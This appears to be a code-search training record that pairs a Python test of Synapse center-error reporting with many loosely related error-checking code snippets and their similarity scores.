do this, get the number of output files\n for basename in nsort(os.listdir(self.logdir)):\n m = self.labels.subdir_re.match(basename)\n if m is None or 'pckl' in basename:\n continue\n # Here is the output directory which contains the files\n subdir = os.path.join(self.logdir, basename)\n # Account for failed jobs. Get the set of file numbers that\n # exist for all h0 and h1 combinations\n self.get_set_file_nums(\n filedir=subdir\n )\n # Take one of the pickle files to see how many data\n # entries it has.\n data_sets = from_file(os.path.join(self.logdir,\n 'data_sets.pckl'))\n # Take the first data key and then the h0 fit to h0 fid\n # which should always exist. The length of this is then\n # the number of trials in the pickle files.\n if 'h0_fit_to_h0_fid' in data_sets[data_sets.keys()[0]].keys():\n pckl_trials = len(data_sets[data_sets.keys()[0]][\n 'h0_fit_to_h0_fid'].keys())\n # The number of pickle trials should match the number of\n # trials derived from the output directory.\n if self.num_trials == pckl_trials:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i trials. If '\n 'this seems incorrect please delete the files: '\n 'data_sets.pckl, all_params.pckl and labels.pckl '\n 'from the logdir you have provided.'%pckl_trials\n )\n pickle_there = True\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i trials. '\n 'However, based on the number of json files in the '\n 'output directory there should be %i trials in '\n 'these pickle files, so they will be regenerated.'%(\n pckl_trials, self.num_trials)\n )\n pickle_there = False\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script which do not seem to '\n 'contain any trials, so they will be regenerated.'\n )\n pickle_there = False\n \n return pickle_there", "def test_conformance_tests_test_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['tests/test_output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")" ]
[ "0.6594361", "0.6371965", "0.6179928", "0.617114", "0.613714", "0.61048645", "0.6091394", "0.6054181", "0.5993377", "0.5975022", "0.5965196", "0.5943787", "0.59276956", "0.5922497", "0.59199405", "0.5838658", "0.58281934", "0.58267826", "0.581185", "0.58048946", "0.57999486", "0.5792472", "0.5785924", "0.5777578", "0.5773663", "0.57687557", "0.57530075", "0.57375085", "0.57300115", "0.57296735", "0.572832", "0.5717879", "0.57006556", "0.56836", "0.568339", "0.56793153", "0.5677779", "0.5675142", "0.5665222", "0.5665006", "0.5652593", "0.5651594", "0.5649209", "0.5632348", "0.5632285", "0.56167144", "0.5614284", "0.5613409", "0.5611928", "0.5611853", "0.5606375", "0.5603455", "0.5595524", "0.55900383", "0.5584713", "0.5581431", "0.55802244", "0.5580214", "0.5574643", "0.5572647", "0.5570695", "0.5563555", "0.5558047", "0.55552876", "0.5553869", "0.55505824", "0.5550197", "0.5545005", "0.55421823", "0.55375487", "0.55375487", "0.5528488", "0.5521033", "0.5520872", "0.55185175", "0.55089426", "0.5504199", "0.5503655", "0.5502014", "0.5492092", "0.5473513", "0.5468844", "0.54681057", "0.5465701", "0.54635745", "0.5461801", "0.545886", "0.5454267", "0.54437804", "0.5443584", "0.54394233", "0.5437092", "0.5424845", "0.5422553", "0.5422045", "0.5418229", "0.5416893", "0.5416407", "0.541396", "0.5413547" ]
0.7143594
0
Test getting all center invalid errors
def test_get_center_invalid_errors(syn): with patch.object( syn, "tableQuery", return_value=QueryResponse ) as patch_query, patch.object( write_invalid_reasons, "_combine_center_file_errors", return_value="errors" ) as patch_combine: center_invalid = write_invalid_reasons.get_center_invalid_errors(syn, "syn3333") assert center_invalid == {"SAGE": "errors", "TEST": "errors"} patch_query.assert_called_once_with("SELECT * FROM syn3333") assert patch_combine.call_count == 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_errors(self) -> None:", "def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = []\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == \"Elevation\":\n\t\t\t\t\tlevelElevationEC = p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine = sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)", "def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors", "def getAll(self):\n x,y,a = self.getxya()\t\n xerrs = [self.errors[0][i] for i in range(len(self.x)) if self.x[i]!=None and self.y[i]!=None]\n yerrs = [self.errors[1][i] for i in range(len(self.x)) if self.x[i]!=None and self.y[i]!=None]\t\n return x,y,a,xerrs,yerrs", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def test_get_error_data_table_all_col_errors(self):\n field_setup = None\n error_names = None\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def test_get_error_data_all_col_errors(self):\n field_setup = None\n error_names = None\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def error(self) -> Sequence[float]:\n errors = []\n for line, sign in zip(self.marker_lines, (-1, 1)):\n if self._orientation == Orientation.UP_DOWN:\n picket_pos = self._fit(line.center.y)\n mlc_pos = line.center.x\n else:\n picket_pos = self._fit(line.center.x)\n mlc_pos = line.center.y\n if (\n self._separate_leaves\n ): # offset the picket position by the DLG and nominal gap\n mag_factor = self._image.sid / 1000\n picket_pos += (\n sign * self._nominal_gap_mm * mag_factor / 2 * self._image.dpmm\n )\n errors.append((mlc_pos - picket_pos) / self._image.dpmm)\n return errors", "def checks(self, error_margin=0.1):\n\n # Check all compartments are positive\n for label in self.labels:\n assert self.compartments[label] >= 0.", "def test_normalize_with_multiple_errors(self) -> None:\n errors_address = address_with_errors()\n try:\n normalize_an_address(errors_address)\n except ShipEngineError as err:\n assert err.request_id is not None\n assert err.request_id.startswith(\"req_\") is True\n assert err.source is ErrorSource.SHIPENGINE.value\n assert err.error_type is ErrorType.ERROR.value\n assert err.error_code is ErrorCode.INVALID_ADDRESS.value\n assert (\n err.message\n == \"Invalid address.\\nInvalid City, State, or Zip\\nInsufficient or Incorrect Address Data\"\n )", "def has_errors(self) -> bool:", "def test_check_cluster1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_cluster(cluster_fail_1)\n assert str(err_info.value) == 'cluster type input not within range of index'", "def test_kyc_get_validation_legal(self):\n pass", "def checkErrors(cHat, c):\n x, y, r = c[0], c[1], c[2]\n # Check if any circles are detected when they shouldn't be (false positive)\n if x == '-' or y =='-' or r == '-':\n if not(x == '-' or y =='-' or r == '-'):\n raise NullEntry()\n elif cHat is not None and len(cHat) >= 1:\n raise FalsePositiveDetection()\n elif math.isnan(float(c[0])) or math.isnan(float(c[1])) or math.isnan(float(c[2])):\n raise NaNError()\n # Check if circles weren't detected when they should have been (true negative)\n elif cHat is None:\n raise TrueNegativeDetection()", "def test_get_xy_invalid_space():\n pass", "def test_get_error_data_table_some_col_errors(self):\n field_setup = None\n error_names = ['first', 'billing_address_1', 'billing_country_area']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])\n pass", "def test__combine_center_file_errors(syn):\n expected_error = (\n f\"\\t{ENT1.name} ({ENT1.id}):\\n\\nmy errors\\nn\\n\\n\"\n f\"\\t{ENT1.name} ({ENT1.id}):\\n\\nerrors here\\nf\\n\\n\"\n )\n calls = [\n mock.call(\"syn1234\", downloadFile=False),\n mock.call(\"syn2345\", downloadFile=False),\n ]\n with patch.object(syn, \"get\", return_value=ENT1) as patch_synget:\n center_errors = write_invalid_reasons._combine_center_file_errors(\n syn, CENTER_ERRORSDF\n )\n assert center_errors == expected_error\n patch_synget.assert_has_calls(calls)", "def lat_errors(self):\r\n try:\r\n _lat_errors = self._validate_latlon(self.sourceLatCol)\r\n return _lat_errors\r\n except:\r\n return None", "def test_unfiltered_total_errors_detected(self):\n text_list, timestamps = pf.get_file(\"GenerateSRT.txt\")\n client = pf.initialize_api()\n sentences = pf.print_sentences(text_list)\n final_error_total = 0\n\n for i, token in enumerate(sentences):\n sequence_switched, end_matches, offset_list, err_message, sentence_error_total = \\\n edf.detect_errors(str(sentences[i]), client, True)\n\n final_error_total += sentence_error_total\n\n self.assertEqual(final_error_total, 6)", "def check_latlon(self):\n\n for station in list(self.station_list.values()):\n station_def = self.station_definitions[station.name]\n lat = float(station.get_obs('LAT')[0])\n lon = float(station.get_obs('LON')[0])\n lat_diff = abs(lat - station_def['lat'])\n lon_diff = abs(lon - station_def['lon'])\n if lat_diff > .1:\n qc_error.all_qc_errors.append(\n qce(\n station_name=station.name,\n error_code=9000,\n old_data_value=lat,\n explanation=\"lats are different for: \" + station.name +\n \". Old value : \" + str(station_def['lat'])\n ))\n if lon_diff > .1:\n qc_error.all_qc_errors.append(\n qce(\n station_name=station.name,\n error_code=9000,\n old_data_value=lon,\n explanation=\"lons are different for: \" + station.name +\n \". Old value : \" + str(station_def['lon'])\n ))", "def test_get_error_data_some_col_errors(self):\n field_setup = None\n error_names = ['first', 'billing_address_1', 'billing_country_area']\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])\n pass", "def check_errors(self, data):\n for entry in data:\n if entry.find('ERROR') != -1:\n return entry\n return False", "def check_get_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def __verify_root(self):\n output = self.output\n for key in self.data:\n if key != self.root:\n output[\"status\"] = False\n output[\"message\"] = \"{0} is not is the correct format.\"\n print(\"-- An Error Occurred -- {0}\".format(output[\"message\"]))\n break\n return output", "def test_check_invalid_centering():\n try:\n import pytest\n except:\n poppy._log.warning('Skipping test test_check_invalid_centering because pytest is not installed.')\n return # We can't do this test if we don't have the pytest.raises function.\n\n # MFT setup style and execute\n\n with pytest.raises(ValueError) as excinfo:\n mft = matrixDFT.MatrixFourierTransform(centering='some garbage value', verbose=True)\n assert excinfo.value.message == 'Error: centering method must be one of [SYMMETRIC, ADJUSTIBLE, FFTRECT, FFTSTYLE]'", "def errors(self) -> List[Error]:", "def testFailed(self):\r\n failedExprKeys = list(self.__testFailedExpressions.keys())\r\n for i in range(len(failedExprKeys)):\r\n for expr in self.__testFailedExpressions[failedExprKeys[i]]:\r\n self.__Calculator.setExpression(expr)\r\n self.__Calculator.calculateResult()\r\n self.assertEqual(self.__testErrors[failedExprKeys[i]], self.__Calculator.getError())", "def assert_no_error(self): \r\n Nx = self['Nx']\r\n Nt = self.m.Nt\r\n L, T = self.problem['L T'.split()]\r\n L = L/2 # only half the domain used (symmetry)\r\n x = np.linspace(0, L, Nx+1) # Mesh points in space \r\n t = np.linspace(0, T, Nt+1) # Mesh points in time\r\n \r\n for n in range(len(t)):\r\n u_e = self.problem.u_exact(x, t[n])\r\n diff = np.abs(self.f.u[n,:] - u_e).max()\r\n print 'diff:', diff\r\n tol = 1E-13\r\n assert diff < tol", "def calc_errors(test_data, loc_by_img):\n one_km_count = 0\n five_km_count = 0\n ten_km_count = 0\n hundred_km_count = 0\n thousand_km_count = 0\n other_count = 0\n for test_img in test_data:\n img_id = test_img['watchlink']\n img_result_loc = loc_by_img[img_id]\n img_actual_loc = Location(float(test_img['latitude']), float(test_img['longitude']))\n error = Location.dist(img_result_loc, img_actual_loc)\n if error < 1:\n one_km_count += 1\n elif error < 5:\n five_km_count += 1\n elif error < 10:\n ten_km_count += 1\n elif error < 100:\n hundred_km_count += 1\n elif error < 1000:\n thousand_km_count += 1\n else:\n other_count += 1\n return [one_km_count, five_km_count, ten_km_count, hundred_km_count, thousand_km_count, other_count]", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def getErrors(self):\n errorList = []\n\n # E0\n try:\n if not self.e0.isValid():\n errorList.append(\"Invalid first error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No first error axis in ErrorEllipse Class.\")\n\n # E1\n try:\n if not self.e1.isValid():\n errorList.append(\"Invalid second error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No second error axis in ErrorEllipse Class.\")\n\n # E2\n try:\n if not self.e2.isValid():\n errorList.append(\"Invalid third error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No third error axis in ErrorEllipse Class.\")\n\n # maximumHorizontalProjection\n try:\n self.maximumHorizontalProjection\n except (NameError, AttributeError):\n errorList.append(\"No MaximumHorizontalProjection in ErrorEllipse Class.\")\n\n # maximumVerticalProjection\n try:\n self.maximumVerticalProjection\n except (NameError, AttributeError):\n errorList.append(\"No MaximumVerticalProjection in ErrorEllipse Class\")\n\n # equivalentHorizontalRadius\n try:\n self.equivalentHorizontalRadius\n except (NameError, AttributeError):\n errorList.append(\"No EquivalentHorizontalRadius in ErrorEllipse class\")\n\n return errorList", "def check_set_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def measure_error_test(self):\n error_dict = self.results._determine_measured_error(\n score_threshold=0.5, plot=False\n )\n assert error_dict[\"mz_error\"] == [0, 0, 0]\n assert error_dict[\"intensity_error\"] == [0, 0, 0]", "def test_get_error_data_table_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def test_no_errors(self):\n test_error = \"\\r\\n--------------------------------------------------------------------\\r\\n\"\\\n \"Your code has been rated at 10.00/10 (previous run: 9.33/10, +0.67)\"\n\n self.assertEqual(\n format_errors(test_error),\n None\n )", "def _assert_cell_no_errors(c):\n if c['cell_type'] != 'code':\n return\n errors = [\"Error name: {}, Error Value: {}\".format(o[\"ename\"], o[\"evalue\"])\n for o in c['outputs']\n if o['output_type'] == 'error']\n\n assert not errors, errors", "def test_get_error_data_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def check_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def test_notebook_no_errors(executed_notebook):\n for c in executed_notebook['cells']:\n _assert_cell_no_errors(c)", "def test_get_errorCode(self):\n for app_num, servo_type in app_nr.items():\n try:\n par = self.get_parameter(servo_type, app_num, ERROR_CODE_IDX, ERROR_CODE_SUB)\n param_obj = self.__dict__[servo_type]._get_errorCode()\n acs_par, completion = param_obj.get_sync()\n if(completion.code):\n print \"\\nError code found in errorCode...\"\n continue\n self.data_match(acs_par, par)\n except NackEx:\n continue", "def errors(self):\n raise NotImplementedError", "def test_filtered_total_errors_detected(self):\n text_list, timestamps = pf.get_file(\"GenerateSRT.txt\")\n client = pf.initialize_api()\n sentences = pf.print_sentences(text_list)\n final_error_total = 0\n\n for i, token in enumerate(sentences):\n sequence_switched, end_matches, offset_list, err_message, sentence_error_total = \\\n edf.detect_errors(str(sentences[i]), client, False)\n\n final_error_total += sentence_error_total\n\n self.assertEqual(final_error_total, 8)", "def testErrorChecking(self):\n discardLs = [17,18,19,20]\n table = {'row1':[1,2,3,4,5],'row2':[6,7,'7s',9,10],'row3':[11,12,13],'row4':[14,15,16]}\n blackJackObj = BlackJack()\n ## Overload Constructor\n blackJackObj.overloadConstructor(table, discardLs)\n self.assertEquals(True,blackJackObj.errorChecking('10')) # empty pos\n self.assertEquals(False,blackJackObj.errorChecking('8')) # taken pos\n self.assertEquals(False,blackJackObj.errorChecking('A')) # invalid input\n self.assertEquals(False,blackJackObj.errorChecking('21')) # out of range", "def get_errors(cursor):\n while True:\n message = cursor.lpop(\"errors\")\n if message is None:\n print(\"There are no errors more\")\n return None\n print(message)", "def test_get_counturingErr(self):\n for app_num, servo_type in app_nr.items():\n try:\n par = self.get_parameter(servo_type, app_num, COUNTURING_ERR_IDX, COUNTURING_ERR_SUB)\n param_obj = self.__dict__[servo_type]._get_counturingErr()\n acs_par, completion = param_obj.get_sync()\n if(completion.code):\n print \"\\nError code found in counturingErr...\"\n continue\n self.data_match(acs_par, par)\n except NackEx:\n continue", "def calculateErrors(cHat, c):\n print(cHat[0], c[0])\n xHat, yHat, rHat, x, y, r = float(cHat[0]), float(cHat[1]), float(cHat[2]), float(c[0]), float(c[1]), float(c[2])\n centerDistance = math.sqrt((xHat - x)**2 + (yHat - y)**2)\n radiusDistance = math.fabs(rHat - r)\n return centerDistance, radiusDistance", "def myError(Clasif, DataMatrixTrain, TagsArrayTrain, DataMatrixTest, TagsArrayTest):\n # Entrenamos, predecimos y calculamos los errores entre la prediccion\n # y el etiquetado que teniamos anteriormente\n Clasif.fit(DataMatrixTrain, TagsArrayTrain)\n predEtiq = Clasif.predLabel(DataMatrixTest)\n return len([i for i in range(len(TagsArrayTest)) if TagsArrayTest[i] != predEtiq[i]])", "def _check_input_data(self):\n\n n0, n1, corr, pval = np.nan, np.nan, np.nan, np.nan\n\n error_code_test = 0\n error_text_test = 'No error occurred'\n try:\n error_code_test, error_msg = self._check_notnull()\n if error_code_test == 0:\n error_code_test, error_msg, n0, n1 = self._check_group_obs(self.test_min_data)\n if error_code_test == 0:\n error_code_test, error_msg, corr, pval = \\\n self._check_spearman_corr(self.min_corr, self.max_p)\n if error_code_test != 0:\n error_text_test = str(error_msg)\n except:\n error_code_test = 9\n error_text_test = 'Unknown Error'\n\n self.checkstats = {'n0': n0, 'n1': n1, 'frame_spearmanR': corr, 'frame_corrPval': pval}\n\n self.error_code_test = error_code_test\n self.error_text_test = error_text_test\n\n return self.error_code_test, self.error_text_test", "def test_notebook_no_errors(executed_notebook):\n for c in executed_notebook[\"cells\"]:\n _assert_cell_no_errors(c)", "def runErrorTests(c, startNx, endNx, stepNx=1, display=False):\n errorsArray = []\n dxs = np.empty(shape=[0])\n iteration = 0\n\n for currNx in range(startNx, endNx, stepNx):\n nx = currNx\n nt = nx\n # initialize the vector of space points, our domain is [0,1]\n x = np.linspace(0, 1, nx)\n dxs = np.append(dxs, x[1] - x[0])\n #to check convergence use smooth function\n phi_ic = ic.cosineBasedFctn(x, 0.5)\n errline, _ = runAllSchemes(x, phi_ic, nx, nt, c)\n errorsArray = np.append(errorsArray, errline)\n iteration = iteration+1\n \n # to check order of convergence we see the behaviour of log-log plots\n # just for extra safety we check >0 for log\n dxLog = np.where(dxs>0, np.log10(dxs), 0)\n ErrorsLog = np.where(errorsArray>0, np.log10(errorsArray), 0)\n ErrorsLog = ErrorsLog.reshape(iteration, len(errline)) \n ErrorsLog = np.matrix.transpose(ErrorsLog)\n methods = [\"FTBS\", \"CTCS\", \"CNCS\", \"LaxWendroff\"]\n if(display):\n for i in range (0, 4):\n plt.plot(dxLog, ErrorsLog[i], label=methods[i])\n coeff = np.polyfit(dxLog,ErrorsLog[i],1)\n print(\"Estimated order of convergence for \"+methods[i]+\\\n \": \"+str(coeff[0]))\n plt.title(\"Log-log plot of L2 errors vs dx\\nc=\"+str(c))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.show()", "def check_and_print_if_error(self): # pragma: no cover\n dupes, empties, not_detected = self._get_aberrations()\n if dupes:\n print 'duplicate entries for:'\n for dup, matches in dupes:\n print ' %s: %s' % (dup, [f.func_name for f in matches])\n if empties:\n print 'empty entries for:'\n for empty in empties:\n print ' ' + str(empty)\n if not_detected:\n print 'dimensions not detected:'\n for n_d in not_detected:\n print ' ' + str(n_d)\n return self.is_correct", "def test_errors(self):\n DifferentRangePassage = self.text.getPassage(\n MyCapytain.common.reference.Reference(\"1.pr.2-1.2\")\n )\n with self.assertRaises(MyCapytain.errors.InvalidSiblingRequest, msg=\"Different range passage have no siblings\"):\n a = DifferentRangePassage.next\n\n with self.assertRaises(MyCapytain.errors.InvalidSiblingRequest, msg=\"Different range passage have no siblings\"):\n a = DifferentRangePassage.prev", "def test_call_incompatible_data(self):\r\n self.cs_overview.DistanceMatrices = [self.single_ele_dm,\r\n self.single_ele_dm]\r\n self.assertRaises(ValueError, self.cs_overview)", "def error_check(command):\r\n\r\n # TODO\r", "def _assert_cell_no_errors(c):\n if c[\"cell_type\"] != \"code\":\n return\n errors = [\n \"Error name: {}, Error Value: {}, trace: {}\".format(\n o[\"ename\"], o[\"evalue\"], \"\\n\".join(o.get(\"traceback\"))\n )\n for o in c[\"outputs\"]\n if o[\"output_type\"] == \"error\"\n ]\n\n if errors:\n pytest.fail(\"Found notebook errors: {}\".format(\"\\n\".join(errors)))", "def _compute_errors(self):\n self.errors = np.sqrt(self.data)\n self.errors[self.errors == 0.] = 1.", "def __call__(self, errors: List[float]) -> List[float]:", "def xerr(self, i):\n return self.errors[0][i]", "def errors_fatal(self) -> List[Error]:", "def test_error_case(self):\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(0))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(-2))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(3.5))", "def test_center(self):\n\n self.assertTrue((self.cs.center == np.array([[0], [0]])).all())", "def error_calculation_test(self):\n dataOrg = [[1,1], [2,2], [3,3], [4,4], [5,5], [6,6], [7,8], [7.3, 5], [8, 0], [9,10]]\n dataCalc = [[1,3], [2,5], [3,0], [4,3], [5,5], [6.1,6], [7,3], [7.3, 5], [8, 0], [9,9]]\n # abs difference: 2 3 3 1 0 NA 5 0 NA 1\n # local errors: 200 150 200 50 0 NA 125 0 NA 20\n # sum: 745\n\n tsOrg = TimeSeries.from_twodim_list(dataOrg)\n tsCalc = TimeSeries.from_twodim_list(dataCalc)\n\n wmape = WeightedMeanAbsolutePercentageError()\n wmape.initialize(tsOrg, tsCalc)\n assert str(wmape.get_error())[:6] == \"93.125\"", "def test_error_aggregates_error_msg(self):\n logger = RepoLogger(__name__)\n RepoLogger.errors[:] = []\n\n logger.error(\"A full commitment's what I'm thinking of\")\n logger.error(\"You wouldn't get this from any other guy\")\n logger.error(\"I just wanna tell you how I'm feeling\")\n logger.error(\"Gotta make you understand\")\n\n self.assertEqual(\n RepoLogger.errors[:],\n [\n \"A full commitment's what I'm thinking of\",\n \"You wouldn't get this from any other guy\",\n \"I just wanna tell you how I'm feeling\",\n \"Gotta make you understand\",\n ],\n )", "def test_invalid_length(self):\n self.assertRaises(ValueError, chart.Chart, attributes={'class':'chart:bar'}, height=\"xxx\" )\n self.assertRaises(ValueError, chart.Chart, attributes={'class':'chart:bar'}, width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaCircle, cy=\"1cm\", cx=\"1cm\", r=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", x=\"1cm\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", width=\"1cm\", points=\"0,0 1,1\", x=\"1cm\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", width=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, width=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", x=\"1cm\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, 